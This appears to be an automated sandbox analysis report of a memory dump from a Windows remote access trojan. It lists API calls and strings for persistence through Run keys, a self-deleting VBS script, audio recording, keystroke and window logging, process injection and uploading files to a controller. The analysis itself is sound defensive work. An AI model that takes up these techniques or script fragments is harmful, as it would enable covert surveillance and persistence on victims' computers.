                                      • Opcode ID: 44220cefaf0d52b658fed7112f8fe454c2b43280ce09bfbfe74d8bc2f4d86b69
                                      • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                      • Opcode Fuzzy Hash: 44220cefaf0d52b658fed7112f8fe454c2b43280ce09bfbfe74d8bc2f4d86b69
                                      • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                      APIs
                                        • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                        • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                        • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                        • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                        • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                        • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                      • ExitProcess.KERNEL32 ref: 0040BFD7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                      • API String ID: 3797177996-2974882535
                                      • Opcode ID: a2ebfed1a6fac9d047817b961aafbaa1f289e708f0a4db7bc0e68b98e2834a79
                                      • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                      • Opcode Fuzzy Hash: a2ebfed1a6fac9d047817b961aafbaa1f289e708f0a4db7bc0e68b98e2834a79
                                      • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                      APIs
                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                      • SetEvent.KERNEL32 ref: 004191CF
                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                      • CloseHandle.KERNEL32 ref: 004191F0
                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                      • API String ID: 738084811-1354618412
                                      • Opcode ID: 00145798d12f94d7d9e1dadce208788b4c6f6002d74890ba5c92e52d73f490ce
                                      • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                      • Opcode Fuzzy Hash: 00145798d12f94d7d9e1dadce208788b4c6f6002d74890ba5c92e52d73f490ce
                                      • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                      • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                      • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                      • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Write$Create
                                      • String ID: RIFF$WAVE$data$fmt
                                      • API String ID: 1602526932-4212202414
                                      • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                      • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                      • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                      • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$EnvironmentVariable$_wcschr
                                      • String ID:
                                      • API String ID: 3899193279-0
                                      • Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                                      • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                      • Opcode Fuzzy Hash: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                                      • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                        • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                      • _free.LIBCMT ref: 0044E4DF
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 0044E501
                                      • _free.LIBCMT ref: 0044E516
                                      • _free.LIBCMT ref: 0044E521
                                      • _free.LIBCMT ref: 0044E543
                                      • _free.LIBCMT ref: 0044E556
                                      • _free.LIBCMT ref: 0044E564
                                      • _free.LIBCMT ref: 0044E56F
                                      • _free.LIBCMT ref: 0044E5A7
                                      • _free.LIBCMT ref: 0044E5AE
                                      • _free.LIBCMT ref: 0044E5CB
                                      • _free.LIBCMT ref: 0044E5E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID: pF
                                      • API String ID: 161543041-2973420481
                                      • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                      • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                      • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                      • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                      • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                      • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                      • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                      • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                      • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                      • API String ID: 2490988753-744132762
                                      • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                      • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                      • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                      • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                        • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                        • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                        • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                      • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                      • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                      • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                      • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                      • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                      • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                      • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                      • Sleep.KERNEL32(00000064), ref: 00411C63
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                      • String ID: /stext "$$.F$@#G$@#G
                                      • API String ID: 1223786279-2596709126
                                      • Opcode ID: 865f057e30e0e1225157f6ef7c2ca327aeea124e0de24150848f7a51d3b135a5
                                      • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                      • Opcode Fuzzy Hash: 865f057e30e0e1225157f6ef7c2ca327aeea124e0de24150848f7a51d3b135a5
                                      • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID: pF
                                      • API String ID: 269201875-2973420481
                                      • Opcode ID: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                                      • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                      • Opcode Fuzzy Hash: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                                      • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040DE79
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                        • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                      • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                      • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                      • API String ID: 193334293-3226144251
                                      • Opcode ID: 6741266e666da6a208b58708eb3623b4d2dfd99b7266586274b9e619f8d5c0bf
                                      • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                      • Opcode Fuzzy Hash: 6741266e666da6a208b58708eb3623b4d2dfd99b7266586274b9e619f8d5c0bf
                                      • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                      • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                      • API String ID: 1332880857-3714951968
                                      • Opcode ID: e02e27612c157c0a8ecd371d73788e90ad2456f665e48e57521c66b2c088977e
                                      • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                                      • Opcode Fuzzy Hash: e02e27612c157c0a8ecd371d73788e90ad2456f665e48e57521c66b2c088977e
                                      • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                                      APIs
                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                      • GetCursorPos.USER32(?), ref: 0041B39E
                                      • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                      • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                      • ExitProcess.KERNEL32 ref: 0041B41A
                                      • CreatePopupMenu.USER32 ref: 0041B420
                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                      • String ID: Close
                                      • API String ID: 1657328048-3535843008
                                      • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                      • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                      • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                      • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: d352d52f1b9345d75488c5de9eae0d63737ffa17687bf4e8527101d8642b8356
                                      • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                      • Opcode Fuzzy Hash: d352d52f1b9345d75488c5de9eae0d63737ffa17687bf4e8527101d8642b8356
                                      • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                      • __aulldiv.LIBCMT ref: 00407D89
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                      • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                      • CloseHandle.KERNEL32(00000000), ref: 00408038
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                      • API String ID: 3086580692-2596673759
                                      • Opcode ID: 106e83cfb5c0d627459ee052b96243632ff4bc59ebe903b039ab75bfa34e7969
                                      • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                      • Opcode Fuzzy Hash: 106e83cfb5c0d627459ee052b96243632ff4bc59ebe903b039ab75bfa34e7969
                                      • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                      APIs
                                        • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                        • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                        • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                        • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                        • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                      • ExitProcess.KERNEL32 ref: 0040C57D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                      • API String ID: 1913171305-2600661426
                                      • Opcode ID: 0a9697e27eb0a9f3dc21f241abbdf80b4229fa0e63835b995fce8774c5d613d6
                                      • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                      • Opcode Fuzzy Hash: 0a9697e27eb0a9f3dc21f241abbdf80b4229fa0e63835b995fce8774c5d613d6
                                      • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 65535$udp
                                      • API String ID: 0-1267037602
                                      • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                      • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                      • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                      • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 00409C81
                                      • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                      • GetForegroundWindow.USER32 ref: 00409C92
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                      • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                        • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                      • String ID: [${ User has been idle for $ minutes }$]
                                      • API String ID: 911427763-3954389425
                                      • Opcode ID: 2042de2e5608c196eda36fce742299401c14f56ece0ee621af81938869a18f06
                                      • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                      • Opcode Fuzzy Hash: 2042de2e5608c196eda36fce742299401c14f56ece0ee621af81938869a18f06
                                      • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                      • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                      • __dosmaperr.LIBCMT ref: 00438646
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                      • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                      • __dosmaperr.LIBCMT ref: 00438683
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                      • __dosmaperr.LIBCMT ref: 004386D7
                                      • _free.LIBCMT ref: 004386E3
                                      • _free.LIBCMT ref: 004386EA
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                      • String ID:
                                      • API String ID: 2441525078-0
                                      • Opcode ID: 2428d6136fa203607d9b9ba94df6370f818a7f930700a212aadf753765814adb
                                      • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                      • Opcode Fuzzy Hash: 2428d6136fa203607d9b9ba94df6370f818a7f930700a212aadf753765814adb
                                      • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID: pF$tF
                                      • API String ID: 269201875-2954683558
